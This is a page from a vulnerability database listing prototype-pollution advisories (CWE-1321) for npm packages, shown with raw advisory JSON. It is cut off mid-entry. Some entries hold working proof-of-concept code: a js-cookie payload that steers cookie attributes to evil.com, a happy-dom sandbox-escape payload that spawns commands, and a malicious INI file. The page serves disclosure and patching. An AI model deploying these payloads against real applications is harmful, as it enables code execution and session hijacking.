Common Weakness Enumeration

CWE-1321

Allowed

Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Abstraction: Variant · Status: Incomplete

The product receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype.

779 vulnerabilities reference this CWE, most recent first.

GHSA-QJ86-V6M7-4QV2

Vulnerability from github – Published: 2024-06-17 18:31 – Updated: 2024-07-05 21:14
VLAI
Summary
Object Resolver Prototype Pollution
Details

apphp js-object-resolver < 3.1.1 is vulnerable to Prototype Pollution via Module.setNestedProperty.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@apphp/object-resolver"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-36577"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-06-17T22:30:00Z",
    "nvd_published_at": "2024-06-17T16:15:15Z",
    "severity": "HIGH"
  },
  "details": "apphp js-object-resolver \u003c 3.1.1 is vulnerable to Prototype Pollution via Module.setNestedProperty.",
  "id": "GHSA-qj86-v6m7-4qv2",
  "modified": "2024-07-05T21:14:25Z",
  "published": "2024-06-17T18:31:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-36577"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apphp/js-object-resolver/commit/7e347a26bf04d6a4f7525f6605666afbb218afca"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/mestrtee/c90189f3d8480a5f267395ec40701373"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apphp/js-object-resolver"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Object Resolver Prototype Pollution"
}

GHSA-QJX8-664M-686J

Vulnerability from github – Published: 2026-05-21 21:20 – Updated: 2026-06-11 14:05
VLAI
Summary
JavaScript Cookie: Per-instance prototype hijack in assign() enables cookie-attribute injection
Details

Summary

js-cookie's internal assign() helper copies properties with for...in + plain assignment. When the source object is produced by JSON.parse, the JSON object's "__proto__" member is an own enumerable property, so the for…in enumerates it and the target[key] = source[key] write triggers the Object.prototype.__proto__ setter on the fresh target ({}). The result is a per-instance prototype hijack: Object.prototype itself is untouched, but the merged attributes object now inherits attacker-controlled keys.

Because the consuming set() function then enumerates the merged object with another for...in, every key the attacker placed on the polluted prototype lands in the resulting Set-Cookie string as an attribute pair. The attacker can set domain=, secure=, samesite=, expires=, and path= on cookies whose attributes the developer thought were locked down.

Impact

Any application that forwards a JSON-derived object as the attributes argument to Cookies.set, Cookies.remove, Cookies.withAttributes, or Cookies.withConverter is vulnerable. This is the standard pattern when cookie configuration comes from a backend:

const cfg = await fetch('/config').then(r => r.json());
Cookies.set('session', token, cfg.cookieAttrs);   // cfg.cookieAttrs influenced by attacker

A payload of {"__proto__":{"domain":"evil.example","secure":"false","samesite":"None"}} causes js-cookie to emit:

Set-Cookie: session=TOKEN; path=/; domain=evil.example; secure=false; samesite=None

Affected code

// src/assign.mjs — full file
export default function (target) {
  for (var i = 1; i < arguments.length; i++) {
    var source = arguments[i]
    for (var key in source) {                 // includes own enumerable '__proto__'
      target[key] = source[key]                // [[Set]] form - fires __proto__ setter
    }
  }
  return target
}

Proof of concept

Node 22.11.0, no third-party deps:

Environment setup

mkdir -p /tmp/jscookie-poc && cd /tmp/jscookie-poc
npm init -y
npm i js-cookie

PoC

ubuntu@kuber:/tmp/jscookie-poc$ cat poc.mjs
let lastSetCookie = '';
globalThis.document = {
  get cookie() { return ''; },
  set cookie(v) { lastSetCookie = v; }
};

const { default: Cookies } = await import('js-cookie');

const attackerAttrs = JSON.parse(
  '{"__proto__":{"secure":"false","domain":"evil.com","samesite":"None","expires":-1}}'
);

Cookies.set('session', 'TOKEN', attackerAttrs);

console.log('Set-Cookie that js-cookie wrote to document.cookie:');
console.log(lastSetCookie);

Execution: cls-2026-05-14-01 44 39

Suggested patch

--- a/src/assign.mjs
+++ b/src/assign.mjs
@@
 export default function (target) {
   for (var i = 1; i < arguments.length; i++) {
     var source = arguments[i]
-    for (var key in source) {
-      target[key] = source[key]
-    }
+    for (var key in source) {
+      if (key === '__proto__' || key === 'constructor' || key === 'prototype') continue
+      Object.defineProperty(target, key, {
+        value: source[key],
+        writable: true,
+        enumerable: true,
+        configurable: true,
+      })
+    }
   }
   return target
 }

Equivalent one-liner alternative - iterate own names only and filter:

for (const key of Object.getOwnPropertyNames(source)) {
  if (key === '__proto__') continue
  target[key] = source[key]
}
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.0.5"
      },
      "package": {
        "ecosystem": "npm",
        "name": "js-cookie"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.0.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-46625"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-21T21:20:31Z",
    "nvd_published_at": "2026-06-10T22:16:59Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\n`js-cookie`\u0027s internal `assign()` helper copies properties with `for...in` + plain assignment. When the source object is produced by `JSON.parse`, the JSON object\u0027s `\"__proto__\"` member is an *own enumerable* property, so the `for\u2026in` enumerates it and the `target[key] = source[key]` write triggers the **`Object.prototype.__proto__` setter** on the fresh `target` (`{}`). The result is a per-instance prototype hijack: `Object.prototype` itself is untouched, but the merged `attributes` object now inherits attacker-controlled keys.\n\nBecause the consuming `set()` function then enumerates the merged object with another `for...in`, every key the attacker placed on the polluted prototype lands in the resulting `Set-Cookie` string as an attribute pair. The attacker can set `domain=`, `secure=`, `samesite=`, `expires=`, and `path=` on cookies whose attributes the developer thought were locked down.\n\n## Impact\n\nAny application that forwards a JSON-derived object as the `attributes` argument to `Cookies.set`, `Cookies.remove`, `Cookies.withAttributes`, or `Cookies.withConverter` is vulnerable. This is the standard pattern when cookie configuration comes from a backend:\n\n```js\nconst cfg = await fetch(\u0027/config\u0027).then(r =\u003e r.json());\nCookies.set(\u0027session\u0027, token, cfg.cookieAttrs);   // cfg.cookieAttrs influenced by attacker\n```\n\nA payload of `{\"__proto__\":{\"domain\":\"evil.example\",\"secure\":\"false\",\"samesite\":\"None\"}}` causes js-cookie to emit:\n\n```\nSet-Cookie: session=TOKEN; path=/; domain=evil.example; secure=false; samesite=None\n```\n\n## Affected code\n\n```js\n// src/assign.mjs \u2014 full file\nexport default function (target) {\n  for (var i = 1; i \u003c arguments.length; i++) {\n    var source = arguments[i]\n    for (var key in source) {                 // includes own enumerable \u0027__proto__\u0027\n      target[key] = source[key]                // [[Set]] form - fires __proto__ setter\n    }\n  }\n  return target\n}\n```\n## Proof of concept\n\nNode 22.11.0, no third-party deps:\n\n### Environment setup\n```bash\nmkdir -p /tmp/jscookie-poc \u0026\u0026 cd /tmp/jscookie-poc\nnpm init -y\nnpm i js-cookie\n```\n\n### PoC\n```js\nubuntu@kuber:/tmp/jscookie-poc$ cat poc.mjs\nlet lastSetCookie = \u0027\u0027;\nglobalThis.document = {\n  get cookie() { return \u0027\u0027; },\n  set cookie(v) { lastSetCookie = v; }\n};\n\nconst { default: Cookies } = await import(\u0027js-cookie\u0027);\n\nconst attackerAttrs = JSON.parse(\n  \u0027{\"__proto__\":{\"secure\":\"false\",\"domain\":\"evil.com\",\"samesite\":\"None\",\"expires\":-1}}\u0027\n);\n\nCookies.set(\u0027session\u0027, \u0027TOKEN\u0027, attackerAttrs);\n\nconsole.log(\u0027Set-Cookie that js-cookie wrote to document.cookie:\u0027);\nconsole.log(lastSetCookie);\n```\n\nExecution:\n\u003cimg width=\"2614\" height=\"1174\" alt=\"cls-2026-05-14-01 44 39\" src=\"https://github.com/user-attachments/assets/120df1fe-7e97-4ca3-904e-ab80d71ecf62\" /\u003e\n\n## Suggested patch\n\n```diff\n--- a/src/assign.mjs\n+++ b/src/assign.mjs\n@@\n export default function (target) {\n   for (var i = 1; i \u003c arguments.length; i++) {\n     var source = arguments[i]\n-    for (var key in source) {\n-      target[key] = source[key]\n-    }\n+    for (var key in source) {\n+      if (key === \u0027__proto__\u0027 || key === \u0027constructor\u0027 || key === \u0027prototype\u0027) continue\n+      Object.defineProperty(target, key, {\n+        value: source[key],\n+        writable: true,\n+        enumerable: true,\n+        configurable: true,\n+      })\n+    }\n   }\n   return target\n }\n```\n\nEquivalent one-liner alternative - iterate own names only and filter:\n\n```js\nfor (const key of Object.getOwnPropertyNames(source)) {\n  if (key === \u0027__proto__\u0027) continue\n  target[key] = source[key]\n}\n```",
  "id": "GHSA-qjx8-664m-686j",
  "modified": "2026-06-11T14:05:06Z",
  "published": "2026-05-21T21:20:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/js-cookie/js-cookie/security/advisories/GHSA-qjx8-664m-686j"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-46625"
    },
    {
      "type": "WEB",
      "url": "https://github.com/js-cookie/js-cookie/commit/eb3c40e89731e99b8970faaf35ddad249c6c0020"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/js-cookie/js-cookie"
    },
    {
      "type": "WEB",
      "url": "https://github.com/js-cookie/js-cookie/releases/tag/v3.0.7"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "JavaScript Cookie: Per-instance prototype hijack in assign() enables cookie-attribute injection"
}

GHSA-QPFV-44F3-QQX6

Vulnerability from github – Published: 2026-03-29 15:44 – Updated: 2026-03-31 18:55
VLAI
Summary
MikroORM has Prototype Pollution in Utils.merge
Details

A prototype pollution vulnerability exists in the Utils.merge helper used internally by MikroORM when merging object structures.

The function did not prevent special keys such as __proto__, constructor, or prototype, allowing attacker-controlled input to modify the JavaScript object prototype when merged.

Exploitation requires application code to pass untrusted user input into ORM operations that merge object structures, such as entity property assignment or query condition construction.

Prototype pollution may lead to denial of service or unexpected application behavior. In certain scenarios, polluted properties may influence query construction and potentially result in SQL injection depending on application code.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@mikro-orm/core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.6.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@mikro-orm/core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.0.0-dev.0"
            },
            {
              "fixed": "7.0.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34221"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-29T15:44:16Z",
    "nvd_published_at": "2026-03-31T16:16:32Z",
    "severity": "HIGH"
  },
  "details": "A prototype pollution vulnerability exists in the `Utils.merge` helper used internally by MikroORM when merging object structures.\n\nThe function did not prevent special keys such as `__proto__`, `constructor`, or `prototype`, allowing attacker-controlled input to modify the JavaScript object prototype when merged.\n\nExploitation requires application code to pass untrusted user input into ORM operations that merge object structures, such as entity property assignment or query condition construction.\n\nPrototype pollution may lead to denial of service or unexpected application behavior. In certain scenarios, polluted properties may influence query construction and potentially result in SQL injection depending on application code.",
  "id": "GHSA-qpfv-44f3-qqx6",
  "modified": "2026-03-31T18:55:10Z",
  "published": "2026-03-29T15:44:16Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mikro-orm/mikro-orm/security/advisories/GHSA-qpfv-44f3-qqx6"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34221"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mikro-orm/mikro-orm"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:L/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "MikroORM has Prototype Pollution in Utils.merge"
}

GHSA-QPM2-6CQ5-7PQ5

Vulnerability from github – Published: 2025-10-15 20:29 – Updated: 2025-11-27 08:54
VLAI
Summary
happy-dom's `--disallow-code-generation-from-strings` is not sufficient for isolating untrusted JavaScript
Details

Summary

The mitigation proposed in GHSA-37j7-fg3j-429f for disabling eval/Function when executing untrusted code in happy-dom does not suffice, since it still allows prototype pollution payloads.

Details

The untrusted script and the rest of the application still run in the same Isolate/process, so attackers can deploy prototype pollution payloads to hijack important references like "process" in the example below, or to hijack control flow via flipping checks of undefined property. There might be other payloads that allow the manipulation of require, e.g., via (univeral) gadgets (https://www.usenix.org/system/files/usenixsecurity23-shcherbakov.pdf).

PoC

Attackers can pollute builtins like Object.prototype.hasOwnProperty() to obtain important references at runtime, e.g., "process". In this way, attackers might be able to execute arbitrary commands like in the example below via spawn().

import { Browser } from "happy-dom";

const browser = new Browser({settings: {enableJavaScriptEvaluation: true}});
const page = browser.newPage({console: true});

page.url = 'https://example.com';
let payload = 'spawn_sync = process.binding(`spawn_sync`);normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(` `);typeof a.shell===`string`?c=a.shell:c=`/bin/sh`,b=[`-c`,g];}typeof a.argv0===`string`?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+`=`+d[f]);return{file:c,args:b,options:a,envPairs:e};};spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:`pipe`,readable:!0,writable:!1},{type:`pipe`,readable:!1,writable:!0},{type:`pipe`,readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}var b=spawn_sync.spawn(a);if(b.output&&a.encoding&&a.encoding!==`buffer`)for(c=0;c<b.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output&&b.output[1],b.stderr=b.output&&b.output[2],b.error&&(b.error= b.error + `spawnSync `+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;};'
page.content = `<html>
<script>
    function f() { let process = this; ${payload}; spawnSync("touch", ["success.flag"]); return "success";} 
    this.constructor.constructor.__proto__.__proto__.toString = f;
    this.constructor.constructor.__proto__.__proto__.hasOwnProperty = f;
    // Other methods that can be abused this way: isPrototypeOf, propertyIsEnumerable, valueOf

</script>
<body>Hello world!</body></html>`;

await browser.close();
console.log(`The process object is ${process}`);
console.log(process.hasOwnProperty('spawn'));

Impact

Arbitrary code execution via breaking out of the Node.js' vm isolation.

Recommended Immediate Actions

Users can freeze the builtins in the global scope to defend against attacks similar to the PoC above. However, the untrusted code might still be able to retrieve all kind of information available in the global scope and exfiltrate them via fetch(), even without prototype pollution capabilities. Not to mention side channels caused by the shared process/isolate. Migration to isolated-vm is suggested instead.

Cris from the Endor Labs Security Research Team, who has worked extensively on JavaScript sandboxing in the past, submitted this advisory.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "happy-dom"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "19.0.0"
            },
            {
              "fixed": "20.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-62410"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-15T20:29:04Z",
    "nvd_published_at": "2025-10-15T18:15:40Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nThe mitigation proposed in GHSA-37j7-fg3j-429f for disabling eval/Function when executing untrusted code in happy-dom does not suffice, since it still allows prototype pollution payloads.\n\n### Details\nThe untrusted script and the rest of the application still run in the same Isolate/process, so attackers can deploy prototype pollution payloads to hijack important references like \"process\" in the example below, or to hijack control flow via flipping checks of undefined property. There might be other payloads that allow the manipulation of require, e.g., via (univeral) gadgets (https://www.usenix.org/system/files/usenixsecurity23-shcherbakov.pdf).\n\n### PoC\nAttackers can pollute builtins like Object.prototype.hasOwnProperty() to obtain important references at runtime, e.g., \"process\". In this way, attackers might be able to execute arbitrary commands like in the example below via spawn().\n\n```js\nimport { Browser } from \"happy-dom\";\n\nconst browser = new Browser({settings: {enableJavaScriptEvaluation: true}});\nconst page = browser.newPage({console: true});\n\npage.url = \u0027https://example.com\u0027;\nlet payload = \u0027spawn_sync = process.binding(`spawn_sync`);normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined\u0026\u0026(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(` `);typeof a.shell===`string`?c=a.shell:c=`/bin/sh`,b=[`-c`,g];}typeof a.argv0===`string`?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+`=`+d[f]);return{file:c,args:b,options:a,envPairs:e};};spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:`pipe`,readable:!0,writable:!1},{type:`pipe`,readable:!1,writable:!0},{type:`pipe`,readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c\u003ca.stdio.length;c++){var e=a.stdio[c]\u0026\u0026a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}var b=spawn_sync.spawn(a);if(b.output\u0026\u0026a.encoding\u0026\u0026a.encoding!==`buffer`)for(c=0;c\u003cb.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output\u0026\u0026b.output[1],b.stderr=b.output\u0026\u0026b.output[2],b.error\u0026\u0026(b.error= b.error + `spawnSync `+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;};\u0027\npage.content = `\u003chtml\u003e\n\u003cscript\u003e\n    function f() { let process = this; ${payload}; spawnSync(\"touch\", [\"success.flag\"]); return \"success\";} \n    this.constructor.constructor.__proto__.__proto__.toString = f;\n    this.constructor.constructor.__proto__.__proto__.hasOwnProperty = f;\n    // Other methods that can be abused this way: isPrototypeOf, propertyIsEnumerable, valueOf\n    \n\u003c/script\u003e\n\u003cbody\u003eHello world!\u003c/body\u003e\u003c/html\u003e`;\n\nawait browser.close();\nconsole.log(`The process object is ${process}`);\nconsole.log(process.hasOwnProperty(\u0027spawn\u0027));\n```\n\n### Impact\nArbitrary code execution via breaking out of the Node.js\u0027 vm isolation.\n\n### Recommended Immediate Actions\nUsers can freeze the builtins in the global scope to defend against attacks similar to the PoC above. However, the untrusted code might still be able to retrieve all kind of information available in the global scope and exfiltrate them via fetch(), even without prototype pollution capabilities. Not to mention side channels caused by the shared process/isolate. Migration to [isolated-vm](https://github.com/laverdet/isolated-vm) is suggested instead.\n\nCris from the Endor Labs Security Research Team, who has worked extensively on JavaScript sandboxing in the past, submitted this advisory.",
  "id": "GHSA-qpm2-6cq5-7pq5",
  "modified": "2025-11-27T08:54:46Z",
  "published": "2025-10-15T20:29:04Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/capricorn86/happy-dom/security/advisories/GHSA-qpm2-6cq5-7pq5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62410"
    },
    {
      "type": "WEB",
      "url": "https://github.com/capricorn86/happy-dom/commit/f4bd4ebe3fe5abd2be2bcea1c07043c8b0b70eea"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/capricorn86/happy-dom"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "happy-dom\u0027s `--disallow-code-generation-from-strings` is not sufficient for isolating untrusted JavaScript"
}

GHSA-QQGX-2P2H-9C37

Vulnerability from github – Published: 2020-12-10 16:53 – Updated: 2022-12-03 03:55
VLAI
Summary
ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse
Details

Overview

The ini npm package before version 1.3.6 has a Prototype Pollution vulnerability.

If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.

Patches

This has been patched in 1.3.6.

Steps to reproduce

payload.ini

[__proto__]
polluted = "polluted"

poc.js:

var fs = require('fs')
var ini = require('ini')

var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
console.log(polluted)
> node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "ini"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.3.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-7788"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-12-10T16:51:39Z",
    "nvd_published_at": "2020-12-11T11:15:00Z",
    "severity": "HIGH"
  },
  "details": "### Overview\nThe `ini` npm package before version 1.3.6 has a Prototype Pollution vulnerability.\n\nIf an attacker submits a malicious INI file to an application that parses it with `ini.parse`, they will pollute the prototype on the application. This can be exploited further depending on the context.\n\n### Patches\n\nThis has been patched in 1.3.6.\n\n### Steps to reproduce\n\npayload.ini\n```\n[__proto__]\npolluted = \"polluted\"\n```\n\npoc.js:\n```\nvar fs = require(\u0027fs\u0027)\nvar ini = require(\u0027ini\u0027)\n\nvar parsed = ini.parse(fs.readFileSync(\u0027./payload.ini\u0027, \u0027utf-8\u0027))\nconsole.log(parsed)\nconsole.log(parsed.__proto__)\nconsole.log(polluted)\n```\n\n```\n\u003e node poc.js\n{}\n{ polluted: \u0027polluted\u0027 }\n{ polluted: \u0027polluted\u0027 }\npolluted\n```",
  "id": "GHSA-qqgx-2p2h-9c37",
  "modified": "2022-12-03T03:55:11Z",
  "published": "2020-12-10T16:53:45Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788"
    },
    {
      "type": "WEB",
      "url": "https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/npm/ini"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JS-INI-1048974"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/1589"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse"
}

GHSA-QR4M-JCVC-3382

Vulnerability from github – Published: 2021-05-06 18:12 – Updated: 2021-05-05 18:52
VLAI
Summary
Prototype Pollution in dot-notes
Details

All versions of package dot-notes up to and including version 3.2.0 are vulnerable to Prototype Pollution via the create function.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "dot-notes"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "3.2.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-7717"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-05-05T18:52:45Z",
    "nvd_published_at": "2020-09-01T10:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "All versions of package dot-notes up to and including version 3.2.0 are vulnerable to Prototype Pollution via the create function.",
  "id": "GHSA-qr4m-jcvc-3382",
  "modified": "2021-05-05T18:52:45Z",
  "published": "2021-05-06T18:12:00Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7717"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JS-DOTNOTES-598668"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype Pollution in dot-notes"
}

GHSA-QR4P-C9WR-PHR6

Vulnerability from github – Published: 2021-03-19 21:01 – Updated: 2021-03-18 23:53
VLAI
Summary
Prototype pollution in set-in
Details

Prototype pollution vulnerability in 'set-in' versions 1.0.0 through 2.0.0 allows attacker to cause a denial of service and may lead to remote code execution.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "set-in"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.0.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-28273"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-03-18T23:53:31Z",
    "nvd_published_at": "2020-12-02T15:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Prototype pollution vulnerability in \u0027set-in\u0027 versions 1.0.0 through 2.0.0 allows attacker to cause a denial of service and may lead to remote code execution.",
  "id": "GHSA-qr4p-c9wr-phr6",
  "modified": "2021-03-18T23:53:31Z",
  "published": "2021-03-19T21:01:46Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28273"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ahdinosaur/set-in/commit/e431effa00195a6f06b111e09733cd1445a91a88"
    },
    {
      "type": "WEB",
      "url": "https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28273"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype pollution in set-in"
}

GHSA-QRX9-X75W-XWJ4

Vulnerability from github – Published: 2023-07-17 15:30 – Updated: 2024-04-04 06:10
VLAI
Details

The Popup by Supsystic WordPress plugin before 1.10.19 has a prototype pollution vulnerability that could allow an attacker to inject arbitrary properties into Object.prototype.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-3186"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-07-17T14:15:10Z",
    "severity": "CRITICAL"
  },
  "details": "The Popup by Supsystic WordPress plugin before 1.10.19 has a prototype pollution vulnerability that could allow an attacker to inject arbitrary properties into Object.prototype.",
  "id": "GHSA-qrx9-x75w-xwj4",
  "modified": "2024-04-04T06:10:10Z",
  "published": "2023-07-17T15:30:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3186"
    },
    {
      "type": "WEB",
      "url": "https://wpscan.com/vulnerability/545007fc-3173-47b1-82c4-ed3fd1247b9c"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QXCH-WHHJ-8956

Vulnerability from github – Published: 2026-05-18 17:35 – Updated: 2026-05-18 17:35
VLAI
Summary
multiparty: Denial of Service via Prototype Pollution leads to Uncaught Exception
Details

Impact

multiparty@4.2.3 and lower versions are vulnerable to denial of service via uncaught exception. By sending a multipart/form-data request with a field name that collides with an inherited Object.prototype property (e.g., __proto__, constructor, toString), the parser invokes .push() on the inherited prototype value rather than an array, throwing a TypeError that propagates as an uncaught exception and crashes the process. Any service accepting multipart uploads via multiparty is affected.

Patches

Users should upgrade to multiparty@4.3.0 or higher.

Workarounds

None.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.2.3"
      },
      "package": {
        "ecosystem": "npm",
        "name": "multiparty"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-8161"
  ],
  "database_specific": {
    "cwe_ids": [
